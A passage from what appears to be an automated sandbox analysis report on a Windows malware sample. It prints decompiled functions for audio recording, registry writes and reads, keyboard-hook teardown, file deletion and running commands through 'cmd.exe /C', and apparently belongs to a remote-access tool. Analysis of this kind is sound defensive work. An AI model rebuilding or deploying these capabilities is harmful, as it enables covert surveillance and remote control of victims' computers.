                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                    • CloseHandle.KERNEL32(?), ref: 004051CA
                    • SetEvent.KERNEL32(?), ref: 004051D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection Timeout
                    • API String ID: 2055531096-499159329
                    • Opcode ID: 93a581aba4d4cce81e03a6f3097b7fe0c1fd636df0b0fe0ced1442166e3cb7aa
                    • Instruction ID: acd4a807b5a3573f0944f86bb73ab0bfe2008ef34d427a491d86df1e980d7653
                    • Opcode Fuzzy Hash: 93a581aba4d4cce81e03a6f3097b7fe0c1fd636df0b0fe0ced1442166e3cb7aa
                    • Instruction Fuzzy Hash: A301F531A41F40AFD7216B368C8256BBFE0FF01302704097FE68366AE2DA789400CF5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E63C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 5ec7cd215b47d3e81d58725e64d282a449f9c984b39dd4e5ec2ecfc9110414b8
                    • Instruction ID: c89670a5e770fe18acd177147ece0a40e316e8aa2dd19e2d34887d20e9b3fb48
                    • Opcode Fuzzy Hash: 5ec7cd215b47d3e81d58725e64d282a449f9c984b39dd4e5ec2ecfc9110414b8
                    • Instruction Fuzzy Hash: 5901F7B05403043EDB10E693CC13FB973685B20308F544C2FBD01761C2FA7D65A2966E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004017EC(signed int __ecx, void* __edx, void* __eflags) {
                    				void* __ebp;
                    				long _t10;
                    				intOrPtr _t13;
                    				signed int _t17;
                    				intOrPtr _t24;
                    				struct wavehdr_tag* _t25;
                    
                    				_t28 = __eflags;
                    				E00401E65(0x473d40, __edx, 0x473d40, __eflags, __ecx);
                    				E00401F9D( *0x471a80);
                    				_t24 =  *0x473d7c; // 0x7d4f38
                    				_t17 = __ecx << 5;
                    				_t25 = _t24 + _t17;
                    				_t25->lpData = E00401FAB(E00401E65(0x473d40, __edx, 0x473d40, _t28, __ecx));
                    				_t10 =  *0x471a80; // 0x0
                    				_t25->dwBufferLength = _t10;
                    				_t25->dwBytesRecorded = 0;
                    				_t25->dwUser = 0;
                    				_t25->dwFlags = 0;
                    				_t25->dwLoops = 0;
                    				waveInPrepareHeader( *0x471ac8, _t25, 0x20);
                    				_t13 =  *0x473d7c; // 0x7d4f38
                    				return waveInAddBuffer( *0x471ac8, _t13 + _t17, 0x20);
                    			}









                    0x004017ec
                    0x00401800
                    0x00401807
                    0x0040180c
                    0x00401814
                    0x0040181a
                    0x00401828
                    0x0040182a
                    0x0040182f
                    0x00401837
                    0x0040183a
                    0x0040183d
                    0x00401840
                    0x00401849
                    0x0040184f
                    0x00401869

                    APIs
                    • waveInPrepareHeader.WINMM(007D4F38,00000020,?,?,00475B28,00473EC8,?,00000000,00401A15), ref: 00401849
                    • waveInAddBuffer.WINMM(007D4F38,00000020,?,00000000,00401A15), ref: 0040185F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderPrepare
                    • String ID: 8O}$x;{
                    • API String ID: 2315374483-2004610689
                    • Opcode ID: 68becf0347e823697d61911131d24ddd2f72b29d2081a8f310605a7b5be1e545
                    • Instruction ID: 7d6bcd3a8c7c8b808ae0dd34e3d901c1c1d2f380840a3882ff4e7afa8cfe84c1
                    • Opcode Fuzzy Hash: 68becf0347e823697d61911131d24ddd2f72b29d2081a8f310605a7b5be1e545
                    • Instruction Fuzzy Hash: 37018B71701201AFC7109F39EC45A29BBB9FB89355B00413AF809D3671EB35A8508B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E004133C2(void* __ecx, short* __edx, short* _a4, char _a8) {
                    				void* _v8;
                    				signed int _t16;
                    				long _t19;
                    				signed int _t21;
                    				signed int _t22;
                    
                    				_push(__ecx);
                    				_push(_t21);
                    				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
                    					_t22 = 0;
                    				} else {
                    					_t16 = E0040247C();
                    					_t19 = RegSetValueExW(_v8, _a4, 0, 1, E00401F04( &_a8), 2 + _t16 * 2);
                    					RegCloseKey(_v8);
                    					_t22 = _t21 & 0xffffff00 | _t19 == 0x00000000;
                    				}
                    				E00401F09();
                    				return _t22;
                    			}








                    0x004133c5
                    0x004133c6
                    0x004133d5
                    0x00413414
                    0x004133d7
                    0x004133db
                    0x004133fb
                    0x00413406
                    0x0041340f
                    0x0041340f
                    0x00413419
                    0x00413424

                    APIs
                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004742C0), ref: 004133CD
                    • RegSetValueExW.ADVAPI32(004742C0,?,00000000,00000001,00000000,00000000,004742D8,?,0040F62C,pth_unenc,004742C0), ref: 004133FB
                    • RegCloseKey.ADVAPI32(004742C0,?,0040F62C,pth_unenc,004742C0), ref: 00413406
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    • Opcode ID: 4875b4d5aeca3ca9459ca26f73ce072f043fe1ae24b6e7f20921f1fa081ed250
                    • Instruction ID: 6e57a9ffe26fdd837a9297bb2d1633e63771c371bfb5858afc50bc70335e53ab
                    • Opcode Fuzzy Hash: 4875b4d5aeca3ca9459ca26f73ce072f043fe1ae24b6e7f20921f1fa081ed250
                    • Instruction Fuzzy Hash: 2AF0C231440218BBDF009FA1EC45FEE372CEB00756F10412AF905A61A2EB39DE04DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0040DDAF(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                    				char _v16;
                    				signed int _t34;
                    				signed int* _t49;
                    				signed int* _t57;
                    				void* _t65;
                    				signed int* _t66;
                    
                    				_t65 = __ecx;
                    				E00434D15(__ecx, 0);
                    				E0040F963(__ecx + 4);
                    				E0040F963(__ecx + 0xc);
                    				E0040F94D(__ecx + 0x14);
                    				E0040F94D(__ecx + 0x1c);
                    				E0040F963(__ecx + 0x24);
                    				E0040F963(__ecx + 0x2c);
                    				_t76 = _a4;
                    				if(_a4 == 0) {
                    					_t49 =  &_v16;
                    					E0040DD5A(_t49, "bad locale name");
                    					E00438B36( &_v16, 0x46dd40);
                    					asm("int3");
                    					_push(_t65);
                    					_t66 = _t49;
                    					E004350A8(_t66);
                    					E0040F948( &(_t66[0xb]));
                    					E0040F948( &(_t66[9]));
                    					E0040F948( &(_t66[7]));
                    					E0040F948( &(_t66[5]));
                    					E0040F948( &(_t66[3]));
                    					E0040F948( &(_t66[1]));
                    					_t57 = _t66;
                    					_t34 =  *_t57;
                    					__eflags = _t34;
                    					if(_t34 == 0) {
                    						return E004452C2(4);
                    					} else {
                    						__eflags = _t34 - 8;
                    						if(_t34 < 8) {
                    							_t37 = 0x471060 + _t34 * 0x18;
                    							__eflags = 0x471060 + _t34 * 0x18;
                    							return E004355BA(0x471060 + _t34 * 0x18, _t37);
                    						}
                    						return _t34;
                    					}
                    				} else {
                    					E0043505D(__ebx, __edx, __edi, _t76, __ecx, _a4);
                    					return _t65;
                    				}
                    			}









                    0x0040ddb8
                    0x0040ddba
                    0x0040ddc2
                    0x0040ddca
                    0x0040ddd2
                    0x0040ddda
                    0x0040dde2
                    0x0040ddea
                    0x0040ddef
                    0x0040ddf3
                    0x0040de0e
                    0x0040de11
                    0x0040de1f
                    0x0040de24
                    0x0040de25
                    0x0040de26
                    0x0040de29
                    0x0040de32
                    0x0040de3a
                    0x0040de42
                    0x0040de4a
                    0x0040de52
                    0x0040de5a
                    0x0040de5f
                    0x00434d6d
                    0x00434d6f
                    0x00434d71
                    0x004452ea
                    0x00434d77
                    0x00434d77
                    0x00434d7a
                    0x00434d7f
                    0x00434d7f
                    0x00000000
                    0x00434d8a
                    0x00434d8b
                    0x00434d8b
                    0x0040ddf5
                    0x0040ddf9
                    0x0040de06
                    0x0040de06

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DDBA
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DDF9
                      • Part of subcall function 0043505D: _Yarn.LIBCPMT ref: 0043507C
                      • Part of subcall function 0043505D: _Yarn.LIBCPMT ref: 004350A0
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040DE1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                    • String ID: bad locale name
                    • API String ID: 3628047217-1405518554
                    • Opcode ID: 8dffa96f24b8bc4dd2b055ddc097beea6716ce31301f7e506b49dc613648ec0a
                    • Instruction ID: 98d2dd492bace07292916b27fd0ea575577f527df3b99acd11860301a2c7dc2d
                    • Opcode Fuzzy Hash: 8dffa96f24b8bc4dd2b055ddc097beea6716ce31301f7e506b49dc613648ec0a
                    • Instruction Fuzzy Hash: 5CF044715006046AC334FB62D893EDEB7A49F24718F50453FB516769D2AF78BA0CC689
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E004131C9(void* __ecx, void* __edx, short* _a4, short* _a8) {
                    				void* _v8;
                    				int _v12;
                    				char _v2060;
                    				void* __ebp;
                    				void* _t19;
                    				void* _t23;
                    				void* _t24;
                    
                    				_t22 = __edx;
                    				_v12 = 0x400;
                    				_t23 = __ecx;
                    				if(RegOpenKeyExW(__edx, _a4, 0, 0x20019,  &_v8) != 0) {
                    					_push(0x46b928);
                    				} else {
                    					RegQueryValueExW(_v8, _a8, 0, 0,  &_v2060,  &_v12);
                    					RegCloseKey(_v8);
                    					_push( &_v2060);
                    				}
                    				E0040417E(_t19, _t23, _t22, _t24);
                    				return _t23;
                    			}










                    0x004131c9
                    0x004131d6
                    0x004131e8
                    0x004131f3
                    0x00413222
                    0x004131f5
                    0x0041320a
                    0x00413213
                    0x0041321f
                    0x0041321f
                    0x00413229
                    0x00413234

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,X2}), ref: 004131EB
                    • RegQueryValueExW.ADVAPI32(?,0040F11C,00000000,00000000,?,00000400), ref: 0041320A
                    • RegCloseKey.ADVAPI32(?), ref: 00413213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: X2}
                    • API String ID: 3677997916-1579876330
                    • Opcode ID: f007e739ad78c71f3d731b562f0db65217e4ce08ea29dd2cbe9af8e8008fe96b
                    • Instruction ID: 37cb9aa1574d862eec5ac66aee0096997b4d0de5af4283403616e6a2ac8b94cf
                    • Opcode Fuzzy Hash: f007e739ad78c71f3d731b562f0db65217e4ce08ea29dd2cbe9af8e8008fe96b
                    • Instruction Fuzzy Hash: F4F0AF75600218FBDB109B90EC05FED777CEB04B02F1040A6BA41B5191DF749B889B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00416843(void* __ebx, void* __edi, void* __ebp, void* __eflags, char _a16, void* _a152, void* _a176) {
                    				void* _t19;
                    
                    				asm("sbb eax, 0x471d48");
                    				if(__eflags != 0) {
                    					ShowWindow( *0x473b1c, 9);
                    					SetForegroundWindow( *0x473b1c);
                    				} else {
                    					E0041C7B9(__ebx, 1, _t19, __edi);
                    					CreateThread(0, 0, E0041CE7B, 0, 0, 0);
                    					 *0x471d48 = 2;
                    				}
                    				_t1 =  &_a16; // 0x404421
                    				E00401E8D(_t1, _t19);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}




                    0x00416843
                    0x00416848
                    0x00416877
                    0x00416883
                    0x0041684a
                    0x0041684c
                    0x0041685d
                    0x00416863
                    0x00416863
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                    • CreateThread.KERNEL32 ref: 0041685D
                    • ShowWindow.USER32(00000009), ref: 00416877
                    • SetForegroundWindow.USER32 ref: 00416883
                      • Part of subcall function 0041C7B9: AllocConsole.KERNEL32(00474320), ref: 0041C7C2
                      • Part of subcall function 0041C7B9: GetConsoleWindow.KERNEL32 ref: 0041C7C8
                      • Part of subcall function 0041C7B9: ShowWindow.USER32(00000000,00000000), ref: 0041C7DB
                      • Part of subcall function 0041C7B9: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041C800
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                    • String ID: !D@
                    • API String ID: 186401046-604454484
                    • Opcode ID: a308b359066d0de079f82d271d90c0d0ebe00bcffc3a1523fc93b522755a3d4c
                    • Instruction ID: 34b4127af89dd69901897cc5164adbfdbc5af49b33e07ef6555da6a9debd5d6f
                    • Opcode Fuzzy Hash: a308b359066d0de079f82d271d90c0d0ebe00bcffc3a1523fc93b522755a3d4c
                    • Instruction Fuzzy Hash: 09F0B4301043049ED310AB65EC95EAB7759EB10345F10483FF805510F2CF34AC85C65D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00415D09(void* __edx, void* __ebp, void* __eflags, char _a16, char _a52, void* _a76, char _a80, void* _a152, void* _a176) {
                    				void* _t11;
                    
                    				_t41 = __eflags;
                    				_t11 = E0040417E(0,  &_a80, __edx, __ebp, E00401FAB(E00401E65( &_a16, __edx, __ebp, __eflags, 0)));
                    				_t35 = L"/C ";
                    				ShellExecuteW(0, L"open", L"cmd.exe", E00401F04(E004042FC(0,  &_a52, L"/C ", __ebp, _t41, _t11)), 0, 0);
                    				E00401F09();
                    				E00401F09();
                    				_t6 =  &_a16; // 0x404421
                    				E00401E8D(_t6, _t35);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}




                    0x00415d09
                    0x00415d23
                    0x00415d29
                    0x00415d4b
                    0x00415d55
                    0x00415b00
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00415D4B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $cmd.exe$open
                    • API String ID: 587946157-3896048727
                    • Opcode ID: a417b32e5b09b65460d437a597aae6217368d6090f3a8c0644c67d885a347aab
                    • Instruction ID: ab6574a38bba218c95e6501b4a66befda764a69794b1fff49bc5164259706542
                    • Opcode Fuzzy Hash: a417b32e5b09b65460d437a597aae6217368d6090f3a8c0644c67d885a347aab
                    • Instruction Fuzzy Hash: A4E0E5B02083056BC709E775CC95CBF73ADAE90749B50483FB142A20E2EF7C9D48C659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0040B721(intOrPtr* __ecx) {
                    				struct HHOOK__** __esi;
                    				signed int _t15;
                    				intOrPtr* _t21;
                    				intOrPtr* _t22;
                    
                    				_t16 = __ecx;
                    				_t21 = __ecx;
                    				 *((char*)(__ecx + 0x49)) = 0;
                    				TerminateThread(E0040A1A4, 0);
                    				if( *_t21 != 0) {
                    					UnhookWindowsHookEx( *__esi);
                    					 *__esi = 0;
                    					TerminateThread(E0040A18E, 0);
                    				}
                    				_t16 = _t21;
                    				_pop(_t21);
                    				_pop(0);
                    				_push(0);
                    				_push(_t21);
                    				_t22 = _t16;
                    				_t2 = _t22 + 0x68; // 0x474140
                    				_t15 = 0 | DeleteFileW(E00401F04(_t2)) != 0x00000000;
                    				if(E004076DE(DeleteFileW(E00401F04(_t2))) != 0) {
                    					_t6 = _t22 + 0x80; // 0x474158
                    					RemoveDirectoryW(E00401F04(_t6));
                    				}
                    				return _t15;
                    			}







                    0x0040b721
                    0x0040b723
                    0x0040b72d
                    0x0040b730
                    0x0040b738
                    0x0040b73c
                    0x0040b748
                    0x0040b74a
                    0x0040b74a
                    0x0040b750
                    0x0040b752
                    0x0040b753
                    0x0040b6de
                    0x0040b6df
                    0x0040b6e0
                    0x0040b6e2
                    0x0040b6fe
                    0x0040b708
                    0x0040b70a
                    0x0040b716
                    0x0040b716
                    0x0040b720

                    APIs
                    • TerminateThread.KERNEL32(0040A1A4,00000000,004742D8,pth_unenc,0040CEC1,004742C0,004742D8,?,pth_unenc), ref: 0040B730
                    • UnhookWindowsHookEx.USER32(004740D8), ref: 0040B73C
                    • TerminateThread.KERNEL32(0040A18E,00000000,?,pth_unenc), ref: 0040B74A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: TerminateThread$HookUnhookWindows
                    • String ID: pth_unenc
                    • API String ID: 3123878439-4028850238
                    • Opcode ID: 4b9d3136e3584994c6c7221721c12e920d870ff46d927cc3a9b6b3aff2e1a8d4
                    • Instruction ID: 67d7c74bf289dc35cd0cd0c60ae9d9b8d4bd522f56ef9da0402dc26c6ecbb8ca
                    • Opcode Fuzzy Hash: 4b9d3136e3584994c6c7221721c12e920d870ff46d927cc3a9b6b3aff2e1a8d4
                    • Instruction Fuzzy Hash: 38E01D71240755EFD7201F505C84415BBDADB54746710087EF6C1B5191CE7E8C14C75D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00449A13(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				unsigned int _v20;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				char _v40;
                    				intOrPtr _v48;
                    				char _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t86;
                    				signed int _t92;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				void* _t101;
                    				void* _t102;
                    				void* _t104;
                    				void* _t107;
                    				void* _t109;
                    				void* _t111;
                    				void* _t115;
                    				char* _t116;
                    				void* _t119;
                    				signed int _t121;
                    				signed int _t128;
                    				signed int* _t129;
                    				signed int _t136;
                    				signed int _t137;
                    				char _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				signed int _t146;
                    				signed int _t151;
                    				char _t156;
                    				char _t157;
                    				void* _t161;
                    				unsigned int _t162;
                    				signed int _t164;
                    				signed int _t166;
                    				signed int _t170;
                    				void* _t171;
                    				signed int* _t172;
                    				signed int _t174;
                    				signed int _t181;
                    				signed int _t182;
                    				signed int _t183;
                    				signed int _t184;
                    				signed int _t185;
                    				signed int _t186;
                    				signed int _t187;
                    
                    				_t171 = __edx;
                    				_t181 = _a24;
                    				if(_t181 < 0) {
                    					_t181 = 0;
                    				}
                    				_t184 = _a8;
                    				 *_t184 = 0;
                    				E0043A1C7(0,  &_v52, _t171, _a36);
                    				_t5 = _t181 + 0xb; // 0xb
                    				if(_a12 > _t5) {
                    					_t172 = _a4;
                    					_t142 = _t172[1];
                    					_v36 =  *_t172;
                    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                    						L11:
                    						__eflags = _t142 & 0x80000000;
                    						if((_t142 & 0x80000000) != 0) {
                    							 *_t184 = 0x2d;
                    							_t184 = _t184 + 1;
                    							__eflags = _t184;
                    						}
                    						__eflags = _a28;
                    						_v16 = 0x3ff;
                    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                    						__eflags = _t172[1] & 0x7ff00000;
                    						_v32 = _t136;
                    						_t86 = 0x30;
                    						if((_t172[1] & 0x7ff00000) != 0) {
                    							 *_t184 = 0x31;
                    							_t185 = _t184 + 1;
                    							__eflags = _t185;
                    						} else {
                    							 *_t184 = _t86;
                    							_t185 = _t184 + 1;
                    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                    							__eflags = _t164;
                    							if(_t164 != 0) {
                    								_v16 = 0x3fe;
                    							} else {
                    								_v16 = _v16 & _t164;
                    							}
                    						}
                    						_t146 = _t185;
                    						_t186 = _t185 + 1;
                    						_v28 = _t146;
                    						__eflags = _t181;
                    						if(_t181 != 0) {
                    							_t30 = _v48 + 0x88; // 0xff1875ff
                    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                    						} else {
                    							 *_t146 = 0;
                    						}
                    						_t92 = _t172[1] & 0x000fffff;
                    						__eflags = _t92;
                    						_v20 = _t92;
                    						if(_t92 > 0) {
                    							L23:
                    							_t33 =  &_v8;
                    							 *_t33 = _v8 & 0x00000000;
                    							__eflags =  *_t33;
                    							_t147 = 0xf0000;
                    							_t93 = 0x30;
                    							_v12 = _t93;
                    							_v20 = 0xf0000;
                    							do {
                    								__eflags = _t181;
                    								if(_t181 <= 0) {
                    									break;
                    								}
                    								_t119 = E00457170( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    								_t161 = 0x30;
                    								_t121 = _t119 + _t161 & 0x0000ffff;
                    								__eflags = _t121 - 0x39;
                    								if(_t121 > 0x39) {
                    									_t121 = _t121 + _t136;
                    									__eflags = _t121;
                    								}
                    								_t162 = _v20;
                    								_t172 = _a4;
                    								 *_t186 = _t121;
                    								_t186 = _t186 + 1;
                    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                    								_t147 = _t162 >> 4;
                    								_t93 = _v12 - 4;
                    								_t181 = _t181 - 1;
                    								_v20 = _t162 >> 4;
                    								_v12 = _t93;
                    								__eflags = _t93;
                    							} while (_t93 >= 0);
                    							__eflags = _t93;
                    							if(_t93 < 0) {
                    								goto L39;
                    							}
                    							_t115 = E00457170( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    							__eflags = _t115 - 8;
                    							if(_t115 <= 8) {
                    								goto L39;
                    							}
                    							_t54 = _t186 - 1; // 0xff8bc35f
                    							_t116 = _t54;
                    							_t138 = 0x30;
                    							while(1) {
                    								_t156 =  *_t116;
                    								__eflags = _t156 - 0x66;
                    								if(_t156 == 0x66) {
                    									goto L33;
                    								}
                    								__eflags = _t156 - 0x46;
                    								if(_t156 != 0x46) {
                    									_t139 = _v32;
                    									__eflags = _t116 - _v28;
                    									if(_t116 == _v28) {
                    										_t57 = _t116 - 1;
                    										 *_t57 =  *(_t116 - 1) + 1;
                    										__eflags =  *_t57;
                    									} else {
                    										_t157 =  *_t116;
                    										__eflags = _t157 - 0x39;
                    										if(_t157 != 0x39) {
                    											 *_t116 = _t157 + 1;
                    										} else {
                    											 *_t116 = _t139 + 0x3a;
                    										}
                    									}
                    									goto L39;
                    								}
                    								L33:
                    								 *_t116 = _t138;
                    								_t116 = _t116 - 1;
                    							}
                    						} else {
                    							__eflags =  *_t172;
                    							if( *_t172 <= 0) {
                    								L39:
                    								__eflags = _t181;
                    								if(_t181 > 0) {
                    									_push(_t181);
                    									_t111 = 0x30;
                    									_push(_t111);
                    									_push(_t186);
                    									E004368A0(_t181);
                    									_t186 = _t186 + _t181;
                    									__eflags = _t186;
                    								}
                    								_t94 = _v28;
                    								__eflags =  *_t94;
                    								if( *_t94 == 0) {
                    									_t186 = _t94;
                    								}
                    								__eflags = _a28;
                    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								_t174 = _a4[1];
                    								_t100 = E00457170( *_a4, 0x34, _t174);
                    								_t137 = 0;
                    								_t151 = (_t100 & 0x000007ff) - _v16;
                    								__eflags = _t151;
                    								asm("sbb ebx, ebx");
                    								if(__eflags < 0) {
                    									L47:
                    									 *(_t186 + 1) = 0x2d;
                    									_t187 = _t186 + 2;
                    									__eflags = _t187;
                    									_t151 =  ~_t151;
                    									asm("adc ebx, 0x0");
                    									_t137 =  ~_t137;
                    									goto L48;
                    								} else {
                    									if(__eflags > 0) {
                    										L46:
                    										 *(_t186 + 1) = 0x2b;
                    										_t187 = _t186 + 2;
                    										L48:
                    										_t182 = _t187;
                    										_t101 = 0x30;
                    										 *_t187 = _t101;
                    										__eflags = _t137;
                    										if(__eflags < 0) {
                    											L56:
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L60:
                    												_push(0);
                    												_push(0xa);
                    												_push(_t137);
                    												_push(_t151);
                    												_t102 = E00456E70();
                    												_v32 = _t174;
                    												 *_t187 = _t102 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												L61:
                    												_t104 = 0x30;
                    												_t183 = 0;
                    												__eflags = 0;
                    												 *_t187 = _t151 + _t104;
                    												 *(_t187 + 1) = 0;
                    												goto L62;
                    											}
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L61;
                    											}
                    											if(__eflags > 0) {
                    												goto L60;
                    											}
                    											__eflags = _t151 - 0xa;
                    											if(_t151 < 0xa) {
                    												goto L61;
                    											}
                    											goto L60;
                    										}
                    										if(__eflags > 0) {
                    											L51:
                    											_push(0);
                    											_push(0x3e8);
                    											_push(_t137);
                    											_push(_t151);
                    											_t107 = E00456E70();
                    											_v32 = _t174;
                    											 *_t187 = _t107 + 0x30;
                    											_t187 = _t187 + 1;
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L55:
                    												_push(0);
                    												_push(0x64);
                    												_push(_t137);
                    												_push(_t151);
                    												_t109 = E00456E70();
                    												_v32 = _t174;
                    												 *_t187 = _t109 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												goto L56;
                    											}
                    											L52:
                    											__eflags = _t137;
